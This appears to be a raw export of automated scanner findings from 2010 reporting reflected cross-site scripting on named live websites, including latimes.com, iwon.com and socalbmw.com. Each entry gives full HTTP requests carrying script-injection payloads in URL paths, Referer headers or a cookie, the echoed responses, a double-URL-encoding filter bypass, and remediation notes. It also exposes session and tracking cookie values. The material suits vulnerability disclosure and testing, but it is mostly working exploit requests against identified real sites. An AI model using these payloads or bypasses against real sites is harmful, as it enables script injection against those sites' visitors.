GET /favicon.icob1c1f%253cscript%253ealert%25281%2529%253c%252fscript%253e0a4eaefdc5 HTTP/1.1 Host: www.socalbmw.com Proxy-Connection: keep-alive Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.215 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: ASP.NET_SessionId=fdoqis34aku3zzipdibjukuj; s_cc=true; SC_LINKS=%5B%5BB%5D%5D; s_nr=1292179244101; s_sq=%5B%5BB%5D%5D; __utmz=117788043.1292179244.1.1.utmcsr=latimes.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=117788043.203287789.1292179244.1292179244.1292179244.1; __utmc=117788043; __utmb=117788043.1.10.1292179244
Response
HTTP/1.1 200 OK Date: Sun, 12 Dec 2010 18:52:03 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 150503
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head>
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 68cba%253cscript%253ealert%25281%2529%253c%252fscript%253e21c48b81764 was submitted in the REST URL parameter 2. This input was echoed as 68cba<script>alert(1)</script>21c48b81764 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /finance/leaseoffers.aspx68cba%253cscript%253ealert%25281%2529%253c%252fscript%253e21c48b81764 HTTP/1.1 Host: www.socalbmw.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_cc=true; __utmz=117788043.1292179244.1.1.utmcsr=latimes.com|utmccn=(referral)|utmcmd=referral|utmcct=/; s_sq=%5B%5BB%5D%5D; s_nr=1292179309502; __utma=117788043.203287789.1292179244.1292179244.1292179244.1; __utmc=117788043; __utmb=117788043.1.10.1292179244; SC_LINKS=%5B%5BB%5D%5D; ASP.NET_SessionId=fdoqis34aku3zzipdibjukuj;
Response
HTTP/1.1 200 OK Date: Sun, 12 Dec 2010 18:52:00 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 150553
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head>
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 508fe'-alert(1)-'24b57513d08 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /dl/index.jhtml HTTP/1.1 Host: www.iwon.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.google.com/search?hl=en&q=508fe'-alert(1)-'24b57513d08
Response
HTTP/1.1 200 OK Date: Sun, 12 Dec 2010 18:54:36 GMT Server: Apache/2.2.11 (Unix) mod_ssl/2.2.11 OpenSSL/0.9.8c DAV/2 mod_jk/1.2.28 Content-Language: en Connection: close Content-Type: text/html;charset=UTF-8 Set-Cookie: ltm=2399230474.20480.0000; expires=Sun, 26-Dec-2010 18:54:36 GMT; path=/ Content-Length: 36688
var sUrl='/dl/tpp.jhtml?w=l&vpartner=ZLYYYYYY5QUS&product=iwon&siteid=&pg=&theme=>rk=&ef_id=&sub=&ref=http://www.google.com/search?hl=en&q=508fe'-alert(1)-'24b57513d08&uVal='+uid+'&verVal='+ver; var sFrameHTML='<iframe id="frameTTP" src="'+sUrl+'" width="1" height="1"> ...[SNIP]...
The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9d5fc"><script>alert(1)</script>293267da7bc was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Request
GET /dl/index.jhtml?spid=473&spu=true&partner=ZLxdm003 HTTP/1.1 Host: www.iwon.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.google.com/search?hl=en&q=9d5fc"><script>alert(1)</script>293267da7bc
Response
HTTP/1.1 200 OK Date: Sun, 12 Dec 2010 18:54:38 GMT Server: Apache/2.2.11 (Unix) mod_ssl/2.2.11 OpenSSL/0.9.8c DAV/2 mod_jk/1.2.28 Content-Language: en Connection: close Content-Type: text/html;charset=UTF-8 Set-Cookie: ltm=2516670986.20480.0000; expires=Sun, 26-Dec-2010 18:54:38 GMT; path=/ Content-Length: 41499
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of the rsi_segs cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1f07f"><script>alert(1)</script>18a7cb5084c was submitted in the rsi_segs cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /services/site/joinus/ HTTP/1.1 Host: www.latimes.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_sess=%20s_cc%3Dtrue%3B%20s_sq%3Dkdigcomicskingdomportal%252Ckdigcomics%252Ckdigglobal%253D%252526pid%25253Dlatimes%2525253Alanding%2525253A12/12/2010%252526pidt%25253D1%252526oid%25253Dfunctiononclick%25252528event%25252529%2525257Bwindow.location.href%2525253D%25252527/shopping/circular/target%25252527%2525253B%2525257D%252526oidt%25253D2%252526ot%25253DDIV%2526tribglobal%253D%252526pid%25253DLatimes.com%25252520%2525252F%25252520groupondailydeal%25252520%2525252F%25252520signup%25252520-%25252520Front.%252526pidt%25253D1%252526oid%25253Djavascript%2525253Acarnival.modal.dropit%252528%252529%2525253B%252526ot%25253DA%3B; __utmz=1.1292179232.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sq=tribglobal%3D%2526pid%253DLatimes.com%252520%25252F%252520games%252520-%252520Front.%2526pidt%253D1%2526oid%253Dfunctiononclick(event)%25257Bwindow.location.href%25253D'%25252Fshopping%25252Fcircular%25252Ftarget'%25253B%25257D%2526oidt%253D2%2526ot%253DDIV; mainPage=/; s_dslv_s=First%20Visit; ebPanelFrequency_.www.latimes.com=4208627%3A2%3A1%3A1292265575065; ENT=SecCookie=F3D270D548318536C2D77FE54B7297C5A15CC9E220DF52CD40A38E513BAB20AF60764680ADCC1F1E6A2900BE611A92B27DC52D36B8C1F7ECC1A386D3BFEE185C86F1C592E76AC8170A88309F35904BEDB6BA57A4B930C21B0FA365FE8389094B06FA2853D6238FD5EDC3B0CC71F10736AA4DFDE3A22A40DCC07A8F862622F94E2AF8CE5410A013A27659229D4B6F26EA5011591849E06DAAB36CF852DA3729069666EEBE00D98825E2E5E3657B098FD938BE19BDADB11752EB9DE98188A83770C4A1EA71FAF4848D7260CF5424B47B7F532FB39E1C0CE4EB; s_dslv=1292179324762; rsi_segs=1f07f"><script>alert(1)</script>18a7cb5084c; s_cc=true; enqp=wzl1pclnc9stwdnqzdxs9hiyphrgipcl; __utma=1.250572545.1292179232.1292179232.1292179232.1; enqs=u2can9gzyq2chxql0em0p488hpihcpl1; s_path=current; __utmc=1; __utmb=1.1.10.1292179232; ebNewBandWidth_.www.latimes.com=338%3A1292179190797;
Response
HTTP/1.1 200 OK Server: Sun-ONE-Web-Server/6.1 P3P: policyref="http://www.latimes.com/w3c/p3p.xml", CP="CAO DSP CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi TELi OUR DELa SAMi UNRi OTRi IND PHY ONL UNI PUR COM NAV INT DEM STA POL HEA PRE" Content-Type: text/html; charset=UTF-8 X-Instance-Name: i6s28z2n1 Expires: Sun, 12 Dec 2010 18:55:19 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Sun, 12 Dec 2010 18:55:19 GMT Connection: close Connection: Transfer-Encoding Content-Length: 110994
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
The value of the rsi_segs cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 25a3e"><script>alert(1)</script>6642ae7ea7c was submitted in the rsi_segs cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /services/site/la-privacy,0,3125046.story HTTP/1.1 Host: www.latimes.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_sess=%20s_cc%3Dtrue%3B%20s_sq%3Dkdigcomicskingdomportal%252Ckdigcomics%252Ckdigglobal%253D%252526pid%25253Dlatimes%2525253Alanding%2525253A12/12/2010%252526pidt%25253D1%252526oid%25253Dfunctiononclick%25252528event%25252529%2525257Bwindow.location.href%2525253D%25252527/shopping/circular/target%25252527%2525253B%2525257D%252526oidt%25253D2%252526ot%25253DDIV%2526tribglobal%253D%252526pid%25253DLatimes.com%25252520%2525252F%25252520groupondailydeal%25252520%2525252F%25252520signup%25252520-%25252520Front.%252526pidt%25253D1%252526oid%25253Djavascript%2525253Acarnival.modal.dropit%252528%252529%2525253B%252526ot%25253DA%3B; __utmz=1.1292179232.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sq=tribglobal%3D%2526pid%253DLatimes.com%252520%25252F%252520games%252520-%252520Front.%2526pidt%253D1%2526oid%253Dfunctiononclick(event)%25257Bwindow.location.href%25253D'%25252Fshopping%25252Fcircular%25252Ftarget'%25253B%25257D%2526oidt%253D2%2526ot%253DDIV; mainPage=/; s_dslv_s=First%20Visit; ebPanelFrequency_.www.latimes.com=4208627%3A2%3A1%3A1292265575065; ENT=SecCookie=F3D270D548318536C2D77FE54B7297C5A15CC9E220DF52CD40A38E513BAB20AF60764680ADCC1F1E6A2900BE611A92B27DC52D36B8C1F7ECC1A386D3BFEE185C86F1C592E76AC8170A88309F35904BEDB6BA57A4B930C21B0FA365FE8389094B06FA2853D6238FD5EDC3B0CC71F10736AA4DFDE3A22A40DCC07A8F862622F94E2AF8CE5410A013A27659229D4B6F26EA5011591849E06DAAB36CF852DA3729069666EEBE00D98825E2E5E3657B098FD938BE19BDADB11752EB9DE98188A83770C4A1EA71FAF4848D7260CF5424B47B7F532FB39E1C0CE4EB; s_dslv=1292179324762; rsi_segs=25a3e"><script>alert(1)</script>6642ae7ea7c; s_cc=true; enqp=wzl1pclnc9stwdnqzdxs9hiyphrgipcl; __utma=1.250572545.1292179232.1292179232.1292179232.1; enqs=u2can9gzyq2chxql0em0p488hpihcpl1; s_path=current; __utmc=1; __utmb=1.1.10.1292179232; ebNewBandWidth_.www.latimes.com=338%3A1292179190797;
Response
HTTP/1.1 200 OK Server: Sun-ONE-Web-Server/6.1 P3P: policyref="http://www.latimes.com/w3c/p3p.xml", CP="CAO DSP CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi TELi OUR DELa SAMi UNRi OTRi IND PHY ONL UNI PUR COM NAV INT DEM STA POL HEA PRE" Content-Type: text/html; charset=UTF-8 X-Instance-Name: i6s29z2n1 Last-Modified: Sun, 12 Dec 2010 18:55:32 GMT Expires: Sun, 12 Dec 2010 18:55:33 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Sun, 12 Dec 2010 18:55:33 GMT Connection: close Connection: Transfer-Encoding Content-Length: 126756
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <ht ...[SNIP]... <script language="JavaScript" src="http://ad.doubleclick.net/adj/trb.latimes/service/site;25a3e"><script>alert(1)</script>6642ae7ea7c;ptype=s;slug=la-privacy;rg=ur;pos=T;dcopt=ist;sz=728x90;tile=1;u=http://www.latimes.com/services/site/la-privacy,0,3125046.story;ord=39896525?" type="text/javascript"> ...[SNIP]...
The value of the rsi_segs cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 970a1"><script>alert(1)</script>faebd9b1fbf was submitted in the rsi_segs cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /services/site/la-reprint-request-splash,0,6731163.htmlstory HTTP/1.1 Host: www.latimes.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_sess=%20s_cc%3Dtrue%3B%20s_sq%3Dkdigcomicskingdomportal%252Ckdigcomics%252Ckdigglobal%253D%252526pid%25253Dlatimes%2525253Alanding%2525253A12/12/2010%252526pidt%25253D1%252526oid%25253Dfunctiononclick%25252528event%25252529%2525257Bwindow.location.href%2525253D%25252527/shopping/circular/target%25252527%2525253B%2525257D%252526oidt%25253D2%252526ot%25253DDIV%2526tribglobal%253D%252526pid%25253DLatimes.com%25252520%2525252F%25252520groupondailydeal%25252520%2525252F%25252520signup%25252520-%25252520Front.%252526pidt%25253D1%252526oid%25253Djavascript%2525253Acarnival.modal.dropit%252528%252529%2525253B%252526ot%25253DA%3B; __utmz=1.1292179232.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sq=tribglobal%3D%2526pid%253DLatimes.com%252520%25252F%252520games%252520-%252520Front.%2526pidt%253D1%2526oid%253Dfunctiononclick(event)%25257Bwindow.location.href%25253D'%25252Fshopping%25252Fcircular%25252Ftarget'%25253B%25257D%2526oidt%253D2%2526ot%253DDIV; mainPage=/; s_dslv_s=First%20Visit; ebPanelFrequency_.www.latimes.com=4208627%3A2%3A1%3A1292265575065; ENT=SecCookie=F3D270D548318536C2D77FE54B7297C5A15CC9E220DF52CD40A38E513BAB20AF60764680ADCC1F1E6A2900BE611A92B27DC52D36B8C1F7ECC1A386D3BFEE185C86F1C592E76AC8170A88309F35904BEDB6BA57A4B930C21B0FA365FE8389094B06FA2853D6238FD5EDC3B0CC71F10736AA4DFDE3A22A40DCC07A8F862622F94E2AF8CE5410A013A27659229D4B6F26EA5011591849E06DAAB36CF852DA3729069666EEBE00D98825E2E5E3657B098FD938BE19BDADB11752EB9DE98188A83770C4A1EA71FAF4848D7260CF5424B47B7F532FB39E1C0CE4EB; s_dslv=1292179324762; rsi_segs=970a1"><script>alert(1)</script>faebd9b1fbf; s_cc=true; enqp=wzl1pclnc9stwdnqzdxs9hiyphrgipcl; __utma=1.250572545.1292179232.1292179232.1292179232.1; enqs=u2can9gzyq2chxql0em0p488hpihcpl1; s_path=current; __utmc=1; __utmb=1.1.10.1292179232; ebNewBandWidth_.www.latimes.com=338%3A1292179190797;
Response
HTTP/1.1 200 OK Server: Sun-ONE-Web-Server/6.1 P3P: policyref="http://www.latimes.com/w3c/p3p.xml", CP="CAO DSP CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi TELi OUR DELa SAMi UNRi OTRi IND PHY ONL UNI PUR COM NAV INT DEM STA POL HEA PRE" Content-Type: text/html; charset=UTF-8 X-Instance-Name: i6s28z1n1 Last-Modified: Sun, 12 Dec 2010 18:55:56 GMT Expires: Sun, 12 Dec 2010 18:55:57 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Sun, 12 Dec 2010 18:55:57 GMT Connection: close Connection: Transfer-Encoding Content-Length: 117015
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <ht ...[SNIP]... <script language="JavaScript" src="http://ad.doubleclick.net/adj/trb.latimes/service/site;970a1"><script>alert(1)</script>faebd9b1fbf;ptype=s;slug=la-reprint-request-splash;rg=ur;pos=T;dcopt=ist;sz=728x90;tile=1;u=http://www.latimes.com/services/site/la-reprint-request-splash,0,6731163.htmlstory;ord=90936428?" type="text/javascript" ...[SNIP]...
The value of the rsi_segs cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f0883"><script>alert(1)</script>c9447c03e19 was submitted in the rsi_segs cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /services/site/lat-terms,0,6713384.htmlstory HTTP/1.1 Host: www.latimes.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_sess=%20s_cc%3Dtrue%3B%20s_sq%3Dkdigcomicskingdomportal%252Ckdigcomics%252Ckdigglobal%253D%252526pid%25253Dlatimes%2525253Alanding%2525253A12/12/2010%252526pidt%25253D1%252526oid%25253Dfunctiononclick%25252528event%25252529%2525257Bwindow.location.href%2525253D%25252527/shopping/circular/target%25252527%2525253B%2525257D%252526oidt%25253D2%252526ot%25253DDIV%2526tribglobal%253D%252526pid%25253DLatimes.com%25252520%2525252F%25252520groupondailydeal%25252520%2525252F%25252520signup%25252520-%25252520Front.%252526pidt%25253D1%252526oid%25253Djavascript%2525253Acarnival.modal.dropit%252528%252529%2525253B%252526ot%25253DA%3B; __utmz=1.1292179232.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sq=tribglobal%3D%2526pid%253DLatimes.com%252520%25252F%252520games%252520-%252520Front.%2526pidt%253D1%2526oid%253Dfunctiononclick(event)%25257Bwindow.location.href%25253D'%25252Fshopping%25252Fcircular%25252Ftarget'%25253B%25257D%2526oidt%253D2%2526ot%253DDIV; mainPage=/; s_dslv_s=First%20Visit; ebPanelFrequency_.www.latimes.com=4208627%3A2%3A1%3A1292265575065; ENT=SecCookie=F3D270D548318536C2D77FE54B7297C5A15CC9E220DF52CD40A38E513BAB20AF60764680ADCC1F1E6A2900BE611A92B27DC52D36B8C1F7ECC1A386D3BFEE185C86F1C592E76AC8170A88309F35904BEDB6BA57A4B930C21B0FA365FE8389094B06FA2853D6238FD5EDC3B0CC71F10736AA4DFDE3A22A40DCC07A8F862622F94E2AF8CE5410A013A27659229D4B6F26EA5011591849E06DAAB36CF852DA3729069666EEBE00D98825E2E5E3657B098FD938BE19BDADB11752EB9DE98188A83770C4A1EA71FAF4848D7260CF5424B47B7F532FB39E1C0CE4EB; s_dslv=1292179324762; rsi_segs=f0883"><script>alert(1)</script>c9447c03e19; s_cc=true; enqp=wzl1pclnc9stwdnqzdxs9hiyphrgipcl; __utma=1.250572545.1292179232.1292179232.1292179232.1; enqs=u2can9gzyq2chxql0em0p488hpihcpl1; s_path=current; __utmc=1; __utmb=1.1.10.1292179232; ebNewBandWidth_.www.latimes.com=338%3A1292179190797;
Response
HTTP/1.1 200 OK Server: Sun-ONE-Web-Server/6.1 P3P: policyref="http://www.latimes.com/w3c/p3p.xml", CP="CAO DSP CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi TELi OUR DELa SAMi UNRi OTRi IND PHY ONL UNI PUR COM NAV INT DEM STA POL HEA PRE" Content-Type: text/html; charset=UTF-8 X-Instance-Name: i6s27z1n1 Last-Modified: Sun, 12 Dec 2010 18:55:57 GMT Expires: Sun, 12 Dec 2010 18:55:57 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Sun, 12 Dec 2010 18:55:57 GMT Connection: close Connection: Transfer-Encoding Content-Length: 135760
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "ht ...[SNIP]... <script language="JavaScript" src="http://ad.doubleclick.net/adj/trb.latimes/service/site;f0883"><script>alert(1)</script>c9447c03e19;ptype=s;slug=lat-terms;rg=ur;pos=T;dcopt=ist;sz=728x90;tile=1;ca=PatentsCopyrightsandTrademarks;en=Chicago;at=PatentsCopyrightsandTrademarks;at=InternationalRelations;at=CrimeLawandJustice;at=EconomyB ...[SNIP]...
The value of the rsi_segs cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 92002"><script>alert(1)</script>f4c9bfd241d was submitted in the rsi_segs cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /services/site/mobile/ HTTP/1.1 Host: www.latimes.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_sess=%20s_cc%3Dtrue%3B%20s_sq%3Dkdigcomicskingdomportal%252Ckdigcomics%252Ckdigglobal%253D%252526pid%25253Dlatimes%2525253Alanding%2525253A12/12/2010%252526pidt%25253D1%252526oid%25253Dfunctiononclick%25252528event%25252529%2525257Bwindow.location.href%2525253D%25252527/shopping/circular/target%25252527%2525253B%2525257D%252526oidt%25253D2%252526ot%25253DDIV%2526tribglobal%253D%252526pid%25253DLatimes.com%25252520%2525252F%25252520groupondailydeal%25252520%2525252F%25252520signup%25252520-%25252520Front.%252526pidt%25253D1%252526oid%25253Djavascript%2525253Acarnival.modal.dropit%252528%252529%2525253B%252526ot%25253DA%3B; __utmz=1.1292179232.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sq=tribglobal%3D%2526pid%253DLatimes.com%252520%25252F%252520games%252520-%252520Front.%2526pidt%253D1%2526oid%253Dfunctiononclick(event)%25257Bwindow.location.href%25253D'%25252Fshopping%25252Fcircular%25252Ftarget'%25253B%25257D%2526oidt%253D2%2526ot%253DDIV; mainPage=/; s_dslv_s=First%20Visit; ebPanelFrequency_.www.latimes.com=4208627%3A2%3A1%3A1292265575065; ENT=SecCookie=F3D270D548318536C2D77FE54B7297C5A15CC9E220DF52CD40A38E513BAB20AF60764680ADCC1F1E6A2900BE611A92B27DC52D36B8C1F7ECC1A386D3BFEE185C86F1C592E76AC8170A88309F35904BEDB6BA57A4B930C21B0FA365FE8389094B06FA2853D6238FD5EDC3B0CC71F10736AA4DFDE3A22A40DCC07A8F862622F94E2AF8CE5410A013A27659229D4B6F26EA5011591849E06DAAB36CF852DA3729069666EEBE00D98825E2E5E3657B098FD938BE19BDADB11752EB9DE98188A83770C4A1EA71FAF4848D7260CF5424B47B7F532FB39E1C0CE4EB; s_dslv=1292179324762; rsi_segs=92002"><script>alert(1)</script>f4c9bfd241d; s_cc=true; enqp=wzl1pclnc9stwdnqzdxs9hiyphrgipcl; __utma=1.250572545.1292179232.1292179232.1292179232.1; enqs=u2can9gzyq2chxql0em0p488hpihcpl1; s_path=current; __utmc=1; __utmb=1.1.10.1292179232; ebNewBandWidth_.www.latimes.com=338%3A1292179190797;
Response
HTTP/1.1 200 OK Server: Sun-ONE-Web-Server/6.1 P3P: policyref="http://www.latimes.com/w3c/p3p.xml", CP="CAO DSP CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi TELi OUR DELa SAMi UNRi OTRi IND PHY ONL UNI PUR COM NAV INT DEM STA POL HEA PRE" Content-Type: text/html; charset=UTF-8 X-Instance-Name: i6s29z1n1 Expires: Sun, 12 Dec 2010 18:55:25 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Sun, 12 Dec 2010 18:55:25 GMT Connection: close Connection: Transfer-Encoding Content-Length: 113732
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
The value of the rsi_segs cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 42950"><script>alert(1)</script>48ec33cdaa was submitted in the rsi_segs cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /services/site/self-service HTTP/1.1 Host: www.latimes.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_sess=%20s_cc%3Dtrue%3B%20s_sq%3Dkdigcomicskingdomportal%252Ckdigcomics%252Ckdigglobal%253D%252526pid%25253Dlatimes%2525253Alanding%2525253A12/12/2010%252526pidt%25253D1%252526oid%25253Dfunctiononclick%25252528event%25252529%2525257Bwindow.location.href%2525253D%25252527/shopping/circular/target%25252527%2525253B%2525257D%252526oidt%25253D2%252526ot%25253DDIV%2526tribglobal%253D%252526pid%25253DLatimes.com%25252520%2525252F%25252520groupondailydeal%25252520%2525252F%25252520signup%25252520-%25252520Front.%252526pidt%25253D1%252526oid%25253Djavascript%2525253Acarnival.modal.dropit%252528%252529%2525253B%252526ot%25253DA%3B; __utmz=1.1292179232.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sq=tribglobal%3D%2526pid%253DLatimes.com%252520%25252F%252520games%252520-%252520Front.%2526pidt%253D1%2526oid%253Dfunctiononclick(event)%25257Bwindow.location.href%25253D'%25252Fshopping%25252Fcircular%25252Ftarget'%25253B%25257D%2526oidt%253D2%2526ot%253DDIV; mainPage=/; s_dslv_s=First%20Visit; ebPanelFrequency_.www.latimes.com=4208627%3A2%3A1%3A1292265575065; ENT=SecCookie=F3D270D548318536C2D77FE54B7297C5A15CC9E220DF52CD40A38E513BAB20AF60764680ADCC1F1E6A2900BE611A92B27DC52D36B8C1F7ECC1A386D3BFEE185C86F1C592E76AC8170A88309F35904BEDB6BA57A4B930C21B0FA365FE8389094B06FA2853D6238FD5EDC3B0CC71F10736AA4DFDE3A22A40DCC07A8F862622F94E2AF8CE5410A013A27659229D4B6F26EA5011591849E06DAAB36CF852DA3729069666EEBE00D98825E2E5E3657B098FD938BE19BDADB11752EB9DE98188A83770C4A1EA71FAF4848D7260CF5424B47B7F532FB39E1C0CE4EB; s_dslv=1292179324762; rsi_segs=42950"><script>alert(1)</script>48ec33cdaa; s_cc=true; enqp=wzl1pclnc9stwdnqzdxs9hiyphrgipcl; __utma=1.250572545.1292179232.1292179232.1292179232.1; enqs=u2can9gzyq2chxql0em0p488hpihcpl1; s_path=current; __utmc=1; __utmb=1.1.10.1292179232; ebNewBandWidth_.www.latimes.com=338%3A1292179190797;
Response (redirected)
HTTP/1.1 200 OK Server: Sun-ONE-Web-Server/6.1 P3P: policyref="http://www.latimes.com/w3c/p3p.xml", CP="CAO DSP CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi TELi OUR DELa SAMi UNRi OTRi IND PHY ONL UNI PUR COM NAV INT DEM STA POL HEA PRE" Content-Type: text/html; charset=UTF-8 X-Instance-Name: i6s29z1n1 Expires: Sun, 12 Dec 2010 18:55:44 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Sun, 12 Dec 2010 18:55:44 GMT Connection: close Connection: Transfer-Encoding Content-Length: 138183
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
